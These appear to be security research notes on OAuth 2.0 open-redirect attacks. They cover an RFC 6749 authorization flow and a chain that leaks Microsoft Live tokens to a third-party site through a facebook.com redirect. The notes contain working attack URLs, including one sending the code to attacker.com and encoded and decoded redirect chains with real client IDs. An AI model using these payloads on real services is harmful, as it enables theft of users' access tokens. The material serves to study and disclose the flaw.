Open redirect in rfc6749 aka 'The OAuth 2.0 Authorization Framework'
an attacker:
Then the attacker can craft a special URI of the form http://victim.com/authorize?response_type=code&client_id=bc88FitX1298KPj2WS259BBMa9_KCfL3&scope=WRONG_SCOPE&**redirect_uri**=**http://attacker.com**
according to Section 4.1.2.1 this should redirect back to attacker.com (without any user interaction, ever...)!!! Here we use the a wrong scope parameter but any reasons other than a missing or invalid redirection URI would had make the trick....
<aside> đź’ˇ Sometimes in order to accomplish some sort of attack you need to have an open redirect. This is only one small part of the chain but an essential one.
</aside>
How Microsoft is giving your data to Facebook... and everyone else
try to modify “redirect_uri” parameter you’ll notice that token is issued to any URL within facebook.com domain
So to leak the OAuth token to a malicious third-party an Open Redirect in facebook.com domain would be required.
https://www.facebook.com/dialog/oauth?type=web_server&scope=invalid&display=popup&client_id=260755904036570&redirect_uri=http://simcracy.com
https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fh[]%26u%3Dgraph.facebook.com%2Foauth%2Fauthorize%3Ftype%3Dweb_server%26scope%3De%26client_id%3D260755904036570%26redirect_uri%3Dhttp%3A%2F%2Fsimcracy.com
Url Decoded ⇒
https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=token&scope=wli.contacts_emails&redirect_uri=http://www.facebook.com/l.php?h[]&u=graph.facebook.com/oauth/authorize?type=web_server&scope=e&client_id=260755904036570&redirect_uri=http://simcracy.com